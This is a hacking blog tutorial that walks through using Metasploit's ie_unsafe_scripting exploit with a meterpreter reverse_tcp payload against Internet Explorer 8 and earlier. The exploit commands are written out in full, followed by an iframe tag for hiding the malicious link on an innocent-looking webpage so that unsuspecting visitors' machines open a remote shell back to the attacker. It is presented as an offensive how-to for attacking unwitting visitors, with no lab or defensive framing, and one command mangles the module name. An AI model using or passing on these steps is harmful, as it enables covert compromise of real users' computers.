How To Get Root Access When People Visit Your Website – Metasploit Exploiting IE8

Metasploit Exploiting IE8- picateshackz.com

It is a complete tutorial to get root access when people visit your website, here i’m using powerful tool Metasploit to setup backdoor entry. Metasploit is build in Hackers Os Kali Linux, i’m suggesting you to read my previous article to know more about Kali Linux: An Introduction To Hacker’s OS: Kali Linux And Setup Tutorial.

The art of hacking is presently focused on attacking the client side rather than the server side. Server operating systems have become more secure, while clients are loaded with insecure software that can be easily exploited. So, as you would expect, the best hacks are now coming at the client side software. so here i’m exploring a client side hack.

Hacking IE8 for Root Access

In this hack, we will exploit Microsoft’s Internet Explorer 6, 7, and 8 onWindows XP, Vista, Windows 7 or Windows Server 2003 and 2008.
When Windows 7 and Windows Server 2008 were released, the default browser was IE8, so unless the target has upgraded their browser, this vulnerable browser is still on their system and we can hack it. In our example, we will use IE 8 on Windows Vista, but it will work on any of the operating systems listed above with Internet Explorer 8.1 or earlier on it.
So, let’s get started. Fire up your Metasploit on Kali Linux  (Introduction to using Metasploit)

Step 1: Find the Appropriate Exploit

Let’s find the appropriate exploit by searching Metasploit for a Windows exploit that takes advantage of unsafe scripting. Type:
msf> search type:exploit platform:windows unsafe
As you can see from the screenshot below, this search brought 15 exploits. The one we want is /exploit/windows/browser/ie_unsafe_scripting.

Step 2: Select This Exploit

Next tell Metasploit that this is the exploit we want to use. Type:
msf> use /exploit/windows/browser/i.e._unsafe_scripting

Step 3: Select the Payload

Then load the payload, in this case, windows/meterpreter/reverse_tcp:
msf> set PAYLOAD windows/meterpreter/reverse_tcp

Step 4: Check Required Options

Next, let’s check to see what options this exploit requires:
msf> show options
We can see from the output displayed above that the payload requires us to set local host (LHOST), or in other words, the IP address of our machine. In my case, it’s 192.168.1.100.

Step 5: Set Local Host

We need to tell Metasploit what our local host (LHOST) IP address is. Type:
msf> set LHOST 192.168.1.100
Because this is a client-side exploit, we don’t need to set the RHOST as we need to manually attack the system by getting them to click on our malicious link.


Step 6: Run the Exploit

Now, let’s run the exploit. Type:
msf> exploit (ie_unsafe_scripting) > exploit
As you can see in the screenshot below, this exploit has generated a link (http://192.168.1.100:8080/HG6Kn71Nva ) that we will have to get our targets to load so we can exploit their browser. To do this, we’ll add a little HTML to an innocent looking webpage.



Step 7: Add the URL to an <IFRAME> Tag

In order to get your target’s browser to load your malicious URL, you can either send it to them directly, or embed it in an iframe on your perfectly innocent website. To do so, just add the following tag to your html anywhere inside the <body> element:


<iframe src=”http://192.168.1.100:8080/HG6Kn71Nva “></iframe>

When the victim tries to load the page, nothing will be displayed. The browser will hang, but we will have activity at our msfconsole. When the victim navigates to the link it will open a active Meterpreter session that we are connected to. We now own this box!

Thank you.

Sharing is caring!

Leave a Reply

Your email address will not be published. Required fields are marked *

Related Posts

Begin typing your search above and press enter to search. Press ESC to cancel.

Back To Top

So glad to see you sticking around!

Want to be the first one to receive the new stuff?

Enter your email address below and we'll send you the goodies straight to your inbox.

Thank You For Subscribing

This means the world to us!

Spamming is not included! Pinky promise.